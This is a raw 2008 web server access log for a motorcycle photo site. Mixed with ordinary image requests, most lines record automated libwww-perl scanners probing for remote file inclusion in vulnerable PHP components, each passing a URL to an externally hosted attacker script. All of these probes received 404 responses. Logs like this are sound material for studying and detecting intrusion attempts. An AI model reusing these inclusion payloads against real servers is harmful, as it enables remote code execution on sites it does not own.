193.87.167.19 - - [05/May/2008:12:48:16 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:48:19 -0700] "GET /logs/access_080311.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:48:19 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.223.191 - - [05/May/2008:12:48:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:49:10 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:49:10 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:49:11 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:15 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:15 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:25 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:25 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:26 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.208.111.178 - - [05/May/2008:12:50:29 -0700] "GET /logs/errors.php?error=http://www.12weeklifetransformation.com/mc/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [05/May/2008:12:50:29 -0700] "GET /errors.php?error=http://www.12weeklifetransformation.com/mc/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.50.26 - - [05/May/2008:12:50:32 -0700] "GET /logs/access_080324.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.25yearsofhits.com/admin/ooid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:50:50 -0700] "GET /logs/access_071224.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:51 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:51 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:50:51 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:51:00 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:51:01 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.82.99.126 - - [05/May/2008:12:51:01 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:37 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:37 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:38 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:38 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:39 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:40 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:41 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:42 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
206.201.174.144 - - [05/May/2008:12:51:43 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:51:45 -0700] "GET /logs/access_080315.log//bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:51:46 -0700] "GET //bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:51:46 -0700] "GET /logs//bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:51:46 -0700] "GET /logs/access_071230.log//bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
140.174.72.157 - - [05/May/2008:12:51:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.oslohiphopklubb.no/images/fig/rhhw,_easter_2007/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:52:05 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:52:05 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.182.166.93 - - [05/May/2008:12:52:05 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:52:12 -0700] "GET /logs//bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.113.24.154 - - [05/May/2008:12:52:12 -0700] "GET //bottom.php?style=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:52:31 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:52:31 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
75.125.162.210 - - [05/May/2008:12:52:31 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:53:11 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:53:11 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:53:12 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:12:53:32 -0700] "GET /logs/errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
78.90.30.31 - - [05/May/2008:12:53:33 -0700] "GET /errors.php?error=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.192 - - [05/May/2008:12:53:33 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [05/May/2008:12:53:33 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.192 - - [05/May/2008:12:53:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.33.45 - - [05/May/2008:12:53:47 -0700] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
82.104.53.93 - - [05/May/2008:12:54:02 -0700] "GET /logs/access_080312.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://sales.sitesled.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.192 - - [05/May/2008:12:54:10 -0700] "GET /logs/access_080113.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.rotary-canelli-nizza.org/r0x.id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.154.38.121 - - [05/May/2008:12:54:47 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://mfe-gay.de/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.28.33 - - [05/May/2008:12:55:01 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.51.158 - - [05/May/2008:12:55:23 -0700] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
96.52.36.19 - - [05/May/2008:12:55:32 -0700] "GET /logs/access_071225.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:55:32 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
96.52.36.19 - - [05/May/2008:12:55:32 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.freewebs.com/anacoramadrid/sistem.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.224.4.132 - - [05/May/2008:12:56:40 -0700] "GET /logs/access_071218.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:56:54 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:56:55 -0700] "GET //appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.15.0.64 - - [05/May/2008:12:56:56 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.t0nyhawk.890m.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
196.38.88.68 - - [05/May/2008:12:57:13 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:12:57:21 -0700] "GET /logs/access_080212.log//avatar.php?page=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:12:57:21 -0700] "GET //avatar.php?page=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
210.112.121.111 - - [05/May/2008:12:57:22 -0700] "GET /logs//avatar.php?page=http://unisel.t35.com/abe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 0 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
67.142.130.23 - - [05/May/2008:12:57:28 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; PeoplePal 3.0)" "www.dmulk.com"
